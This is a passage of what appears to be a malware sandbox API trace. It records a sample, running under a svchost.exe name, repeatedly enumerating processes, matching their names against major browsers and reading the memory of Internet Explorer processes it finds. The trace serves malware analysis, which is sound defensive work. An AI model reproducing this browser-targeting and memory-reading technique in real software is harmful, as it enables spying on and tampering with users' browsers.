	[0199.692] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.692] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0199.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.692] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.693] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0199.693] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x19f0
	[0199.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.693] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0199.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.694] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.694] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0199.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.694] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0199.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x19f4
	[0199.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.695] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0199.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.696] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.697] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0199.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.697] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.698] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0199.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x19f8
	[0199.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.698] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0199.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.699] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.699] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0199.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.699] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.699] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0199.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x19fc
	[0199.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.700] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0199.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.700] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.701] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0199.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.701] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.702] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0199.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1a00
	[0199.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.702] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0199.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.703] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.703] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0199.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.704] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.704] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0199.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1a04
	[0199.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.705] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0199.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.705] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.705] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0199.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.706] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.706] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0199.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1a08
	[0199.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.707] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0199.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.707] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.707] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0199.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.707] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.707] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0199.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1a0c
	[0199.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.708] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0199.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.709] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.709] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0199.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.710] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.710] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0199.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1a10
	[0199.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.711] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0199.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.711] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.712] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0199.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.713] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.713] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0199.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1a14
	[0199.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.714] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0199.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.714] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.715] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0199.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.715] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.716] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0199.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1a18
	[0199.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.716] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0199.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.717] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.718] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0199.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.718] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0199.719] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1a1c
	[0199.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.719] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0199.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.720] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.720] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0199.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.721] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.722] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1a20
	[0199.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.723] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.723] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.723] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.724] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.724] NtQueryInformationProcess (in: ProcessHandle=0x1a20, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.724] ReadProcessMemory (in: hProcess=0x1a20, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.724] ReadProcessMemory (in: hProcess=0x1a20, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.724] ReadProcessMemory (in: hProcess=0x1a20, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.724] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.724] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1a24
	[0199.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.725] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.726] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.726] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.726] NtQueryInformationProcess (in: ProcessHandle=0x1a24, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.726] ReadProcessMemory (in: hProcess=0x1a24, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.726] ReadProcessMemory (in: hProcess=0x1a24, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.726] ReadProcessMemory (in: hProcess=0x1a24, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.726] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1a28
	[0199.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.775] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.776] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.776] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0199.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1a2c
	[0199.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0199.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.777] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0199.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.778] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.778] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1a30
	[0199.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.779] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.779] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.780] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.780] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0199.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1a34
	[0199.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.781] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.781] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.782] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.782] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.782] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1a38
	[0199.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.783] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.783] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.784] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.784] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.784] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0199.785] CloseHandle (hObject=0x188) returned 1
	[0199.785] Sleep (dwMilliseconds=0x64) 
	[0199.884] GetCurrentProcessId () returned 0x110
	[0199.884] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0199.886] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0199.887] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0199.888] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0199.890] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1a3c
	[0199.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.890] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.890] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.890] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.891] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.891] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.891] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.891] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.892] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1a40
	[0199.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.893] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.893] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.893] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.894] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.894] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.894] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
